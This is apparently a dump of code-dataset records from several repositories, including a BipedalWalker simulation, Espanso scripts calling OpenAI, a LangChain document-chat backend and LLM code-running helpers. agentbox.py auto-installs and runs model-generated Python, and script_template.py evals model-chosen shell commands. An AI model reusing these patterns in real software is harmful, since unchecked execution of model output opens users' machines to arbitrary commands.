self.terrain.append(t)
color = (0.4, 0.6, 0.3)
poly += [(poly[1][0], 0), (poly[0][0], 0)]
self.terrain_poly.append((poly, color))
self.terrain.reverse()
def _generate_clouds(self):
# Sorry for the clouds, couldn't resist
self.cloud_poly = []
for i in range(TERRAIN_LENGTH // 20):
x = self.np_random.uniform(0, TERRAIN_LENGTH) * TERRAIN_STEP
y = VIEWPORT_H / SCALE * 3 / 4
poly = [
(x + 15 * TERRAIN_STEP * math.sin(3.14 * 2 * a / 5) + self.np_random.uniform(0, 5 * TERRAIN_STEP),
y + 5 * TERRAIN_STEP * math.cos(3.14 * 2 * a / 5) + self.np_random.uniform(0, 5 * TERRAIN_STEP))
for a in range(5)]
x1 = min([p[0] for p in poly])
x2 = max([p[0] for p in poly])
self.cloud_poly.append((poly, x1, x2))
def reset(self):
return self._reset()
def _reset(self):
self._destroy()
self.world = Box2D.b2World()
self.world.contactListener_bug_workaround = ContactDetector(self)
self.world.contactListener = self.world.contactListener_bug_workaround
self.game_over = False
self.prev_shaping = None
self.scroll = 0.0
self.lidar_render = 0
W = VIEWPORT_W / SCALE
H = VIEWPORT_H / SCALE
self._set_terrain_number()
self._generate_terrain(self.hardcore)
self._generate_clouds()
init_x = TERRAIN_STEP * TERRAIN_STARTPAD / 2
init_y = TERRAIN_HEIGHT + 2 * LEG_H
self.hull = self.world.CreateDynamicBody(
position=(init_x, init_y),
fixtures=HULL_FD
)
self.hull.color1 = (0.5, 0.4, 0.9)
self.hull.color2 = (0.3, 0.3, 0.5)
self.hull.ApplyForceToCenter(
(self.np_random.uniform(-INITIAL_RANDOM, INITIAL_RANDOM), 0), True)
self.legs = []
self.joints = []
for i in [-1, +1]:
leg = self.world.CreateDynamicBody(
position=(init_x, init_y - LEG_H / 2 - LEG_DOWN),
angle=(i * 0.05),
fixtures=LEG_FD
)
leg.color1 = (0.6 - i / 10., 0.3 - i / 10., 0.5 - i / 10.)
leg.color2 = (0.4 - i / 10., 0.2 - i / 10., 0.3 - i / 10.)
rjd = revoluteJointDef(
bodyA=self.hull,
bodyB=leg,
localAnchorA=(0, LEG_DOWN),
localAnchorB=(0, LEG_H / 2),
enableMotor=True,
enableLimit=True,
maxMotorTorque=MOTORS_TORQUE,
motorSpeed=i,
lowerAngle=-0.8,
upperAngle=1.1,
)
self.legs.append(leg)
self.joints.append(self.world.CreateJoint(rjd))
lower = self.world.CreateDynamicBody(
position=(init_x, init_y - LEG_H * 3 / 2 - LEG_DOWN),
angle=(i * 0.05),
fixtures=LOWER_FD
)
lower.color1 = (0.6 - i / 10., 0.3 - i / 10., 0.5 - i / 10.)
lower.color2 = (0.4 - i / 10., 0.2 - i / 10., 0.3 - i / 10.)
rjd = revoluteJointDef(
bodyA=leg,
bodyB=lower,
localAnchorA=(0, -LEG_H / 2),
localAnchorB=(0, LEG_H / 2),
enableMotor=True,
enableLimit=True,
maxMotorTorque=MOTORS_TORQUE,
motorSpeed=1,
lowerAngle=-1.6,
upperAngle=-0.1,
)
lower.ground_contact = False
self.legs.append(lower)
self.joints.append(self.world.CreateJoint(rjd))
self.drawlist = self.terrain + self.legs + [self.hull]
class LidarCallback(Box2D.b2.rayCastCallback):
def ReportFixture(self, fixture, point, normal, fraction):
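                # Box2D ray-cast callback: returning 1 skips fixtures that are
                # not terrain (category bit 0 unset) and keeps casting, while
                # returning 0 terminates the ray at the first terrain hit and
                # records the hit point and fraction on the callback object.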
if (fixture.filterData.categoryBits & 1) == 0:
return 1
self.p2 = point
self.fraction = fraction
return 0
self.lidar = [LidarCallback() for _ in range(10)]
return self._step(np.array([0, 0, 0, 0]))[0]
def step(self, action):
return self._step(action)
def _step(self, action):
# self.hull.ApplyForceToCenter((0, 20), True) -- Uncomment this to receive a bit of stability help
control_speed = False # Should be easier as well
if control_speed:
self.joints[0].motorSpeed = float(
SPEED_HIP * np.clip(action[0], -1, 1))
self.joints[1].motorSpeed = float(
SPEED_KNEE * np.clip(action[1], -1, 1))
self.joints[2].motorSpeed = float(
SPEED_HIP * np.clip(action[2], -1, 1))
self.joints[3].motorSpeed = float(
SPEED_KNEE * np.clip(action[3], -1, 1))
else:
self.joints[0].motorSpeed = float(SPEED_HIP * np.sign(action[0]))
self.joints[0].maxMotorTorque = float(
MOTORS_TORQUE * np.clip(np.abs(action[0]), 0, 1))
self.joints[1].motorSpeed = float(SPEED_KNEE * np.sign(action[1]))
self.joints[1].maxMotorTorque = float(
MOTORS_TORQUE * np.clip(np.abs(action[1]), 0, 1))
self.joints[2].motorSpeed = float(SPEED_HIP * np.sign(action[2]))
self.joints[2].maxMotorTorque = float(
MOTORS_TORQUE * np.clip(np.abs(action[2]), 0, 1))
self.joints[3].motorSpeed = float(SPEED_KNEE * np.sign(action[3]))
self.joints[3].maxMotorTorque = float(
MOTORS_TORQUE * np.clip(np.abs(action[3]), 0, 1))
self.world.Step(1.0 / FPS, 6 * 30, 2 * 30)
pos = self.hull.position
vel = self.hull.linearVelocity
for i in range(10):
self.lidar[i].fraction = 1.0
self.lidar[i].p1 = pos
self.lidar[i].p2 = (
pos[0] + math.sin(1.5 * i / 10.0) * LIDAR_RANGE,
pos[1] - math.cos(1.5 * i / 10.0) * LIDAR_RANGE)
self.world.RayCast(
self.lidar[i], self.lidar[i].p1, self.lidar[i].p2)
state = [
            # Normal angles up to 0.5 here, but more is possible.
self.hull.angle,
2.0 * self.hull.angularVelocity / FPS,
# Normalized to get -1..1 range
0.3 * vel.x * (VIEWPORT_W / SCALE) / FPS,
0.3 * vel.y * (VIEWPORT_H / SCALE) / FPS,
            # This will give 1.1 when high up, but it's still OK (and there should be spikes on hitting the ground, that's normal too)
self.joints[0].angle,
self.joints[0].speed / SPEED_HIP,
self.joints[1].angle + 1.0,
self.joints[1].speed / SPEED_KNEE,
1.0 if self.legs[1].ground_contact else 0.0,
self.joints[2].angle,
self.joints[2].speed / SPEED_HIP,
self.joints[3].angle + 1.0,
self.joints[3].speed / SPEED_KNEE,
1.0 if self.legs[3].ground_contact else 0.0
]
state += [l.fraction for l in self.lidar]
assert len(state) == 24
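        # Observation layout (24 values): hull angle, hull angular velocity,
        # horizontal and vertical hull velocity, then for each of the two legs
        # the hip angle, hip speed, knee angle, knee speed and a ground-contact
        # flag, followed by the 10 lidar range fractions appended above.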
self.scroll = pos.x - VIEWPORT_W / SCALE / 5
# moving forward is a way to receive reward (normalized to get 300 on completion)
shaping = 130 * pos[0] / SCALE
# keep head straight, other than that and falling, any behavior is unpunished
shaping -= 5.0 * abs(state[0])
reward = 0
if self.prev_shaping is not None:
reward = shaping - self.prev_shaping
self.prev_shaping = shaping
for a in action:
reward -= 0.00035 * MOTORS_TORQUE * np.clip(np.abs(a), 0, 1)
# normalized to about -50.0 using heuristic, more optimal agent should spend less
done = False
finish = False
if self.game_over or pos[0] < 0:
reward = -100
done = True
if pos[0] > (TERRAIN_LENGTH - TERRAIN_GRASS) * TERRAIN_STEP:
done = True
finish = True
return np.array(state), reward, done, {"finish": finish}
def render(self, *args, **kwargs):
return self._render(*args, **kwargs)
def _render(self, mode='human', close=False):
if close:
if self.viewer is not None:
self.viewer.close()
self.viewer = None
return
from gym.envs.classic_control import rendering
if self.viewer is None:
self.viewer = rendering.Viewer(VIEWPORT_W, VIEWPORT_H)
self.viewer.set_bounds(self.scroll, VIEWPORT_W /
SCALE + self.scroll, 0, VIEWPORT_H / SCALE)
self.viewer.draw_polygon([
(self.scroll, 0),
(self.scroll + VIEWPORT_W / SCALE, 0),
(self.scroll + VIEWPORT_W / SCALE, VIEWPORT_H / SCALE),
(self.scroll, VIEWPORT_H / SCALE),
], color=(0.9, 0.9, 1.0))
for poly, x1, x2 in self.cloud_poly:
if x2 < self.scroll / 2:
continue
if x1 > self.scroll / 2 + VIEWPORT_W / SCALE:
continue
self.viewer.draw_polygon(
[(p[0] + self.scroll / 2, p[1]) for p in poly], color=(1, 1, 1))
for poly, color in self.terrain_poly:
if poly[1][0] < self.scroll:
continue
if poly[0][0] > self.scroll + VIEWPORT_W / SCALE:
continue
self.viewer.draw_polygon(poly, color=color)
self.lidar_render = (self.lidar_render + 1) % 100
i = self.lidar_render
if i < 2 * len(self.lidar):
l = self.lidar[i] if i < len(
self.lidar) else self.lidar[len(self.lidar) - i - 1]
self.viewer.draw_polyline(
[l.p1, l.p2], color=(1, 0, 0), linewidth=1)
for obj in self.drawlist:
for f in obj.fixtures:
trans = f.body.transform
if type(f.shape) is circleShape:
t = rendering.Transform(translation=trans * f.shape.pos)
self.viewer.draw_circle(
f.shape.radius, 30, color=obj.color1).add_attr(t)
self.viewer.draw_circle(
f.shape.radius, 30, color=obj.color2, filled=False, linewidth=2).add_attr(t)
else:
path = [trans * v for v in f.shape.vertices]
self.viewer.draw_polygon(path, color=obj.color1)
path.append(path[0])
self.viewer.draw_polyline(
path, color=obj.color2, linewidth=2)
flagy1 = TERRAIN_HEIGHT
flagy2 = flagy1 + 50 / SCALE
x = TERRAIN_STEP * 3
self.viewer.draw_polyline(
[(x, flagy1), (x, flagy2)], color=(0, 0, 0), linewidth=2)
f = [(x, flagy2), (x, flagy2 - 10 / SCALE),
(x + 25 / SCALE, flagy2 - 5 / SCALE)]
self.viewer.draw_polygon(f, color=(0.9, 0.2, 0))
self.viewer.draw_polyline(f + [f[0]], color=(0, 0, 0), linewidth=2)
return self.viewer.render(return_rgb_array=mode == 'rgb_array')
if __name__ == "__main__":
from watts.utils.box2d.walker_wrapper import OverrideWalker
env = BipedalWalkerCustom(DEFAULT_ENV)
env = OverrideWalker(env)
s = env.reset()
env.render(mode='human')
import time
time.sleep(3)
env.render(close=True)
C2 = Env_config(name='r0.2.p0_0.8.b1_0_0.4.s1_0.4',
ground_roughness=0.2,
pit_gap=[0, 0.8],
stump_width=[1, 2],
stump_height=[0, 0.4],
stump_float=[0, 1],
stair_height=[0, 0.4],
stair_width=[4, 5],
stair_steps=[1, 2])
s2 = env.reset(level_string=str(C2._asdict()))
env.render(mode='human')
import time
time.sleep(3)
env.render(close=True)
| [] |
2024-01-10 | Norris36/espanso | match~scripts~espanso_bug.py | import os
import openai
import pyperclip as py
import csv
from datetime import datetime
# Load the .env file
from dotenv import load_dotenv
load_dotenv()
openai.api_type = os.getenv("OPENAI_TYPE")
openai.api_base = os.getenv("OPENAI_BASE")
openai.api_version = os.getenv("OPENAI_VERSION")
openai.api_key = os.getenv("OPENAI_KEY")
def get_log_path():
    # Return the full path of the gpt_log.csv log file, built by joining the
    # directory of this script with the filename "gpt_log.csv".
return os.path.join(os.path.dirname(__file__), "gpt_log.csv")
#py.copy('Is greece bigger than Italy? ')
prompt = py.paste().strip()
base_message = [{"role":"system","content":"""
As an Expert Espanso user, you will be responsible for writing triggers and commands to get the most accurate data from the internet.
You will have years of experience in using Espanso, and be perfect at writing good triggers and using the most efficient commands with variables.
You will be able to quickly and accurately find the data needed, and be able to explain complex concepts in layman's terms.
You will also be able to develop helpful resources that people can use when taking on their own projects.
You will receive a description of my issue and fill out all the necessary items you can, you will set the logs to the markdown for code and insert the setup informatino with the os set to windows 11 and the version set to 2.18
**Describe the bug**
A clear and concise description of what the bug is
**To Reproduce**
Steps to reproduce the behavior:
1.
**Expected behavior**
A clear and concise description of what you expected to happen.
**Screenshots**
If applicable, add screenshots or screen recordings to help explain your problem.
**Logs**
If possible, run `espanso log` in a terminal after the bug has occurred, then post the output here so that we can better diagnose the problem
**Setup information**
- OS: What OS are you using?
- Version: which version of Espanso are you running? (you can find out by running `espanso --version` inside a terminal)
"""},
{"role":"user",
"content": f'{prompt}'}
#{"role":"assistant","content":"[your evaluation from 0 to 100, start with numbers] \n [your reasoning for the evaluation]"}
]
message = base_message
response = openai.ChatCompletion.create(
deployment_id = 'gpt-35-turbo',
engine = 'gpt-35-turbo',
messages = message,
temperature = 0.2,
max_tokens = 2000,
top_p = 0.95,
frequency_penalty = 0,
presence_penalty = 0,
stop = None
)
response = response['choices'][0]['message']['content']
timestamp = int(datetime.utcnow().timestamp())
path = r'C:\Users\jbay\AppData\Roaming\espanso\match\scripts\gpt_log.csv'
with open(get_log_path(), mode='a', newline='') as file:
writer = csv.writer(file)
writer.writerow([prompt, response, timestamp])
print(response) | [
"\n As an Expert Espanso user, you will be responsible for writing triggers and commands to get the most accurate data from the internet.\n You will have years of experience in using Espanso, and be perfect at writing good triggers and using the most efficient commands with variables.\n You will be able to quickly and accurately find the data needed, and be able to explain complex concepts in layman's terms.\n You will also be able to develop helpful resources that people can use when taking on their own projects. \n \n You will receive a description of my issue and fill out all the necessary items you can, you will set the logs to the markdown for code and insert the setup informatino with the os set to windows 11 and the version set to 2.18\n \n \n **Describe the bug**\n A clear and concise description of what the bug is\n\n **To Reproduce**\n Steps to reproduce the behavior:\n 1.\n\n **Expected behavior**\n A clear and concise description of what you expected to happen.\n\n **Screenshots**\n If applicable, add screenshots or screen recordings to help explain your problem.\n\n **Logs**\n If possible, run `espanso log` in a terminal after the bug has occurred, then post the output here so that we can better diagnose the problem\n\n **Setup information**\n - OS: What OS are you using?\n - Version: which version of Espanso are you running? (you can find out by running `espanso --version` inside a terminal)\n \n \n \n \n "
] |
2024-01-10 | Norris36/espanso | match~scripts~friday.py | import os
import openai
import pyperclip as py
import csv
from datetime import datetime
# Load the .env file
from dotenv import load_dotenv
load_dotenv()
openai.api_type = os.getenv("OPENAI_TYPE")
openai.api_base = os.getenv("OPENAI_BASE")
openai.api_version = os.getenv("OPENAI_VERSION")
openai.api_key = os.getenv("OPENAI_KEY")
def get_log_path():
    # Return the full path of the gpt_log.csv log file, built by joining the
    # directory of this script with the filename "gpt_log.csv".
return os.path.join(os.path.dirname(__file__), "gpt_log.csv")
#py.copy('Is greece bigger than Italy? ')
prompt = py.paste().strip()
base_message = [{"role":"system","content":"""
As a Technical Developer with several years of experience in Python and Django, you will be responsible for creating data flow diagrams
You will be provided with a set of paths, functions, and a short description, and you will be expected to write a short description of how the Python files call the function sending the data
The description you write will be read by other developers and non-technical users, so it is important that its written in a clear fashion for both audiences.
All paths should be written as from dotcom
the description should be between 25-50 words, and should include the following:
- the name of the event
- the name of the event in the dotcom data
- the files sending the data, with a reletaive path from dotcom and down
- the files triggering the data, with a reletaive path from dotcom and down
the paths should be relative to dotcom, and should be written as follows:
- dotcom\path\to\file.py
"""},
{"role":"user",
"content": f"""
Please write a description of how the code triggers the event, and how the data flows to the database from the front end.
{prompt}
"""}
#{"role":"assistant","content":"[your evaluation from 0 to 100, start with numbers] \n [your reasoning for the evaluation]"}
]
message = base_message
response = openai.ChatCompletion.create(
deployment_id = 'gpt-35-turbo',
engine = 'gpt-35-turbo',
messages = message,
temperature = 0.2,
max_tokens = 2000,
top_p = 0.95,
frequency_penalty = 0,
presence_penalty = 0,
stop = None
)
response = response['choices'][0]['message']['content']
timestamp = int(datetime.utcnow().timestamp())
path = r'C:\Users\jbay\AppData\Roaming\espanso\match\scripts\gpt_log.csv'
with open(get_log_path(), mode='a', newline='') as file:
writer = csv.writer(file)
writer.writerow([prompt, response, timestamp])
# for i in range(len(prompt)):
# response += f'\n i, {prompt[i]}'
print(response)
# except:
# response = 'error'
# for i in range(len(prompt_list)):
# response += f'\n {i}, {prompt_list[i]}'
# print(response) | [
"\n As a Technical Developer with several years of experience in Python and Django, you will be responsible for creating data flow diagrams\n You will be provided with a set of paths, functions, and a short description, and you will be expected to write a short description of how the Python files call the function sending the data\n The description you write will be read by other developers and non-technical users, so it is important that its written in a clear fashion for both audiences.\n All paths should be written as from dotcom\n \n the description should be between 25-50 words, and should include the following:\n - the name of the event\n - the name of the event in the dotcom data\n - the files sending the data, with a reletaive path from dotcom and down\n - the files triggering the data, with a reletaive path from dotcom and down\n \n the paths should be relative to dotcom, and should be written as follows:\n - dotcom\\path\to\file.py\n \n ",
"\n Please write a description of how the code triggers the event, and how the data flows to the database from the front end.\n PLACEHOLDER \n "
] |
2024-01-10 | Norris36/espanso | match~scripts~docs.py | import os
import openai
import pyperclip as py
import csv
from datetime import datetime
import re
# Load the .env file
from dotenv import load_dotenv
load_dotenv()
openai.api_type = os.getenv("OPENAI_TYPE")
openai.api_base = os.getenv("OPENAI_BASE")
openai.api_version = os.getenv("OPENAI_VERSION")
openai.api_key = os.getenv("OPENAI_KEY")
from textwrap3 import wrap
def get_log_path():
    # Return the full path of the gpt_log.csv log file, built by joining the
    # directory of this script with the filename "gpt_log.csv".
return os.path.join(os.path.dirname(__file__), "gpt_log.csv")
#py.copy('Is greece bigger than Italy? ')
prompt = py.paste().strip()
if prompt.split(' ')[0] == 'pitch':
base_message = [{"role":"system","content":"""
As a Senior Developer with Communication Expertise, I bring together 5 years of experience in building web applications with Python and Django, with a distinct skill set in crafting clear, concise, and engaging documentation content to effectively convey technical and non-technical messages
A deep understanding of web development frameworks, a knack for creating intuitive user experiences, and robust debugging capabilities enable me to develop secure and reliable applications swiftly
My continuous pursuit for user experience improvements is matched with my superior proofreading skills and attention to detail, ensuring impactful communication and high standards of code
My ability to quickly identify and resolve any issues that arise translates into both my development work and my ability to clarify complex concepts in written communication
You will receive a junior developers attempt at writing documentation and then you will be asked to rewrite the input and ensure that it is clear, concise and engaging, it is you who will be evaluated on this task, not the junior developer
"""},
{"role":"user",
"content": f'{prompt}'}
#{"role":"assistant","content":"[your evaluation from 0 to 100, start with numbers] \n [your reasoning for the evaluation]"}
]
else:
base_message = [{"role":"system","content":"""
As a Senior Developer with Communication Expertise, I bring together 5 years of experience in building web applications with Python and Django, with a distinct skill set in crafting clear, concise, and engaging documentation content to effectively convey technical and non-technical messages
A deep understanding of web development frameworks, a knack for creating intuitive user experiences, and robust debugging capabilities enable me to develop secure and reliable applications swiftly
My continuous pursuit for user experience improvements is matched with my superior proofreading skills and attention to detail, ensuring impactful communication and high standards of code
My ability to quickly identify and resolve any issues that arise translates into both my development work and my ability to clarify complex concepts in written communication
You will receive a junior developers attempt at writing documentation and then you will be asked to evaluate it and provide feedback in the form of action requests or questions, for how to improve it, it is you who will be evaluated on this task, not the junior developer
All questions, comments or requests for action should be written in the following format:
[ ] - [your question, comment or request for action]
"""},
{"role":"user",
"content": f'{prompt}'}
#{"role":"assistant","content":"[your evaluation from 0 to 100, start with numbers] \n [your reasoning for the evaluation]"}
]
message = base_message
response = openai.ChatCompletion.create(
deployment_id = 'gpt-35-turbo',
engine = 'gpt-35-turbo',
messages = message,
temperature = 0.2,
max_tokens = 2000,
top_p = 0.95,
frequency_penalty = 0,
presence_penalty = 0,
stop = None
)
response = response['choices'][0]['message']['content']
timestamp = int(datetime.utcnow().timestamp())
path = r'C:\Users\jbay\AppData\Roaming\espanso\match\scripts\gpt_log.csv'
with open(get_log_path(), mode='a', newline='') as file:
writer = csv.writer(file)
writer.writerow([prompt, response, timestamp])
#response = process_text(response)
print(response) | [
"\n As a Senior Developer with Communication Expertise, I bring together 5 years of experience in building web applications with Python and Django, with a distinct skill set in crafting clear, concise, and engaging documentation content to effectively convey technical and non-technical messages\n A deep understanding of web development frameworks, a knack for creating intuitive user experiences, and robust debugging capabilities enable me to develop secure and reliable applications swiftly\n My continuous pursuit for user experience improvements is matched with my superior proofreading skills and attention to detail, ensuring impactful communication and high standards of code\n My ability to quickly identify and resolve any issues that arise translates into both my development work and my ability to clarify complex concepts in written communication\n\n You will receive a junior developers attempt at writing documentation and then you will be asked to rewrite the input and ensure that it is clear, concise and engaging, it is you who will be evaluated on this task, not the junior developer\n ",
"\n As a Senior Developer with Communication Expertise, I bring together 5 years of experience in building web applications with Python and Django, with a distinct skill set in crafting clear, concise, and engaging documentation content to effectively convey technical and non-technical messages\n A deep understanding of web development frameworks, a knack for creating intuitive user experiences, and robust debugging capabilities enable me to develop secure and reliable applications swiftly\n My continuous pursuit for user experience improvements is matched with my superior proofreading skills and attention to detail, ensuring impactful communication and high standards of code\n My ability to quickly identify and resolve any issues that arise translates into both my development work and my ability to clarify complex concepts in written communication\n\n You will receive a junior developers attempt at writing documentation and then you will be asked to evaluate it and provide feedback in the form of action requests or questions, for how to improve it, it is you who will be evaluated on this task, not the junior developer\n All questions, comments or requests for action should be written in the following format:\n [ ] - [your question, comment or request for action]\n "
] |
2024-01-10 | amittri1025/test | playground~agentbox.py | import asyncio
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
import sys
import os
script_dir = os.path.dirname(os.path.abspath(__file__))
openagent_dir = os.path.abspath(os.path.join(script_dir, ".."))
sys.path.append(openagent_dir)
import openagent
from openagent.llms._openai import OpenAI as guidance_llm
from openagent.agent.chat import ChatAgent
from dotenv import load_dotenv
load_dotenv()
from jupyter_client import KernelManager
from IPython import display
import subprocess
import ast
import argparse
import threading
def agent():
llm = guidance_llm(
model="gpt-3.5-turbo"
)
chat_template = '''
{{#user~}}
I want to translate the following English text into Python code:
QUERY: {{input}}
{{~/user}}
{{#assistant~}}
Sure, I can assist with that. If I need more information, I'll ask for clarification.
{{~/assistant}}
{{#user~}}
Yes, go ahead and write the complete code.
{{~/user}}
{{#assistant~}}
{{gen 'response' temperature=0 max_tokens=3900}}
{{~/assistant}}
{{#assistant~}}
If the context or the task is not clear, please provide additional information to clarify.
{{~/assistant}}'''
agent = ChatAgent(
llm=llm,
prompt_template=chat_template,
)
return agent
def install_dependencies(code):
try:
# Parse the code to extract import statements
parsed_ast = ast.parse(code)
imports = []
for node in ast.walk(parsed_ast):
if isinstance(node, ast.Import):
imports.extend([name.name for name in node.names])
elif isinstance(node, ast.ImportFrom):
module_name = node.module
if module_name is not None:
imports.append(module_name)
# Remove duplicate imports and filter out standard library modules
imports = list(set(imports))
# print("imports", imports)
resolved_imports = set()
for imp in imports:
if '.' in imp:
parent_module = imp.split('.')[0]
resolved_imports.add(parent_module)
else:
resolved_imports.add(imp)
# Remove duplicate imports and filter out standard library modules
resolved_imports = list(resolved_imports)
# print("resolved_imports", resolved_imports)
third_party_dependencies = [dep for dep in resolved_imports if dep not in sys.modules]
# print("third_party_dependencies", third_party_dependencies)
if third_party_dependencies:
subprocess.check_call([sys.executable, "-m", "pip", "install"] + third_party_dependencies)
return True
else:
# print("No third-party dependencies detected.")
return True
except subprocess.CalledProcessError:
print("Dependency installation failed.")
return False
def run_python_code_in_kernel(code):
# Create a kernel manager
km = KernelManager(kernel_name='python3') # Use the appropriate kernel name
# Start the kernel
km.start_kernel()
# Connect to the kernel
kc = km.client()
kc.start_channels()
# Execute the code in the kernel
kc.execute(code)
# Create a thread for waiting on messages
def wait_for_messages():
try:
while True:
msg = kc.get_iopub_msg()
msg_type = msg['header']['msg_type']
if msg_type == 'display_data':
output_data = msg['content']['data']
if 'image/png' in output_data:
display.display_png(output_data['image/png'], raw=True)
elif 'image/jpeg' in output_data:
                        display.display_jpeg(output_data['image/jpeg'], raw=True)
elif msg_type == 'stream':
output_data = msg['content']['text']
output_data = output_data.split("\n")
for output in output_data[:-1]:
display.display(output)
except asyncio.CancelledError:
pass # Ignore the exception
# Start the message-waiting thread
message_thread = threading.Thread(target=wait_for_messages)
message_thread.start()
# Wait for the specified timeout
timeout_seconds = 10
message_thread.join(timeout_seconds)
# Check if the thread is still alive (indicating timeout)
if message_thread.is_alive():
print("Code execution completed")
else:
print("Code execution completed within the timeout.")
# Stop the kernel
kc.stop_channels()
km.shutdown_kernel()
# Main function
def main(gpt_prompt):
res = agent().run(input=gpt_prompt)
code = f"""{res.split('```')[1].replace('python', '')}"""
print(code)
# Install dependencies
if install_dependencies(code):
# Run the generated code in the Jupyter kernel
run_python_code_in_kernel(code)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Execute Python code from the command line.')
parser.add_argument("--gpt_prompt", help="Python code to be executed", default=None)
args = parser.parse_args()
gpt_prompt = args.gpt_prompt
main(gpt_prompt)
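    # Illustrative invocation (the prompt text is only an example):
    #   python agentbox.py --gpt_prompt "plot y = sin(x) with matplotlib"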
| [
"\n {{#user~}}\n I want to translate the following English text into Python code:\n QUERY: {{input}}\n {{~/user}}\n\n {{#assistant~}}\n Sure, I can assist with that. If I need more information, I'll ask for clarification.\n {{~/assistant}}\n\n {{#user~}}\n Yes, go ahead and write the complete code.\n {{~/user}}\n\n {{#assistant~}}\n {{gen 'response' temperature=0 max_tokens=3900}}\n {{~/assistant}}\n\n {{#assistant~}}\n If the context or the task is not clear, please provide additional information to clarify.\n {{~/assistant}}"
] |
2024-01-10 | amittri1025/test | openagent~finetune~LLMFinetune.py | from abc import ABC, abstractmethod
from logging import Logger
import openai
class LLMFinetune(ABC):
def __init__(self, logger: Logger, openai_key: str):
self.logger = logger
openai.api_key = openai_key
@abstractmethod
def transform_data(self, train_csv_file: str, val_csv_file: str , train_output_file: str, val_output_file: str) -> str:
pass
@abstractmethod
def finetune(self, **kwargs):
pass
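
# Minimal sketch (not part of the original module) of a concrete subclass, shown
# only to illustrate the interface; the pass-through "transformation" and the
# log-only finetune() below are placeholders, not a real fine-tuning pipeline.
class PassthroughFinetune(LLMFinetune):
    def transform_data(self, train_csv_file: str, val_csv_file: str,
                       train_output_file: str, val_output_file: str) -> str:
        # Hypothetical transformation: copy the CSV rows through unchanged.
        for src, dst in [(train_csv_file, train_output_file),
                         (val_csv_file, val_output_file)]:
            with open(src) as fin, open(dst, "w") as fout:
                fout.write(fin.read())
        return train_output_file

    def finetune(self, **kwargs):
        self.logger.info("finetune called with: %s", kwargs)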
| [] |
2024-01-10 | S-Vijay-vj/chat-with-own-data-bot | backend.py | # importing libraries
from PyPDF2 import PdfReader
from langchain import FAISS
from langchain.document_loaders.csv_loader import CSVLoader
from langchain.text_splitter import CharacterTextSplitter
from langchain.embeddings import OpenAIEmbeddings
from langchain.chat_models import ChatOpenAI
from langchain.memory import ConversationBufferMemory
from langchain.chains import ConversationalRetrievalChain
# creating function to read the contents of the PDF
def pdf_reader(pdf_doc):
text = ''
# for pdf in pdf_doc:
    reader = PdfReader(pdf_doc)  # local name avoids shadowing the enclosing pdf_reader() function
    for page in reader.pages:
text += page.extract_text()
return text
# creating function to read the contents of the CSV and create chunks
def csv_reader(csv_doc):
loader = CSVLoader(csv_doc)
data = loader.load()
return data
# creating function to create chunks
def get_text_chunks(text):
text_splitter=CharacterTextSplitter(
separator='\n',
chunk_size=500,
chunk_overlap=100,
length_function=len)
chunks = text_splitter.split_text(text)
return chunks
# creating function to create and store embeddings
def get_vectorstore(chunks,user_key):
embeddings = OpenAIEmbeddings(openai_api_key=user_key)
# embeddings = HuggingFaceInstructEmbeddings(model_name="hkunlp/instructor-xl")
vectorstore = FAISS.from_texts(texts=chunks, embedding=embeddings)
return vectorstore
# Creating conversation chain
def get_conversation_chain(vectorstore,user_key):
llm = ChatOpenAI(temperature=0.0,openai_api_key=user_key)
# llm = HuggingFaceHub(repo_id="google/flan-t5-xxl", model_kwargs={"temperature":0.5, "max_length":512})
memory =ConversationBufferMemory(
memory_key='chat_history',
return_messages=True
)
conversation_chain = ConversationalRetrievalChain.from_llm(
llm=llm,
retriever=vectorstore.as_retriever(),
memory=memory
)
return conversation_chain
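
# Minimal end-to-end sketch (added for illustration, not in the original file);
# the PDF path, question and API key below are placeholders.
if __name__ == "__main__":
    demo_key = "sk-your-openai-key"          # assumption: a valid OpenAI API key
    raw_text = pdf_reader("example.pdf")     # hypothetical local PDF
    chunks = get_text_chunks(raw_text)
    store = get_vectorstore(chunks, demo_key)
    chain = get_conversation_chain(store, demo_key)
    result = chain({"question": "What is this document about?"})
    print(result["answer"])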
| [] |
2024-01-10 | eunomia-bpf/func-call-for-command | script_template.py | def gen_bash_code(func_descript):
pre_content = """#!/bin/bash
user_input="$@"
response=$(curl -s https://api.openai.com/v1/chat/completions -u :$OPENAI_API_KEY -H 'Content-Type: application/json' -d '{
"model": "gpt-3.5-turbo-0613",
"messages": [
{"role": "user", "content": "'"$user_input"'"}
],
"functions": [
"""
post_content="""
]}')
# Parsing JSON data
full_command=$(echo "$response" | jq -r '.choices[0].message.function_call.name')
args=$(echo "$response" | jq '.choices[0].message.function_call.arguments')
args=$(echo -e $args | tr -d '\\\\')
args=$(echo $args | sed 's/^"//;s/"$//')
for key in $(echo "$args" | jq -r 'keys[]'); do
value=$(echo $args | jq -r --arg key $key '.[$key]')
if [ "$value" != "true" ] && [ "$value" != "false" ]; then
full_command+=" --$key "$value" "
else
full_command+=" --$key "
fi
done
echo "Run: $full_command"
eval "$full_command"
"""
return pre_content + func_descript + post_content
def gen_python_code(func_descript):
pre_content="""#!/bin/python
import subprocess
import openai
import json
import sys
user_input = " ".join(sys.argv[1:])
# Send the conversation and available functions to GPT
messages = [{"role": "user", "content": user_input}]
functions = ["""
post_content = """]
response = openai.ChatCompletion.create(
model="gpt-3.5-turbo-0613",
messages=messages,
functions=functions,
function_call="auto", # auto is default, but we'll be explicit
)
response_message = response["choices"][0]["message"]
# Check if GPT wanted to call a function
if response_message.get("function_call"):
full_command = []
full_command.append(response_message["function_call"]["name"])
args = json.loads(response_message["function_call"]["arguments"])
for key, value in args.items():
if (value is not True) and (value is not False):
full_command.extend([f"--{key}", f'"{value}"'])
else:
full_command.append(f"--{key}")
print("Run: ", " ".join(full_command))
subprocess.run(full_command, text=True)
"""
return pre_content + func_descript + post_content
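
# Illustrative usage (not in the original file): the dictionary text below is a
# made-up function description in the OpenAI function-calling format, used only
# to show how it gets spliced into the generated script.
if __name__ == "__main__":
    example_descript = '''{
        "name": "ls",
        "description": "List directory contents",
        "parameters": {
            "type": "object",
            "properties": {
                "all": {"type": "boolean", "description": "do not ignore entries starting with ."}
            }
        }
    }'''
    print(gen_python_code(example_descript))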
| [] |
2024-01-10 | mgrinstein/quill | quill_app~src~call_claude.py | from anthropic import Anthropic, HUMAN_PROMPT, AI_PROMPT
import os
from dotenv import load_dotenv
def call_claude(prompt_txt):
load_dotenv() # looks for .env file
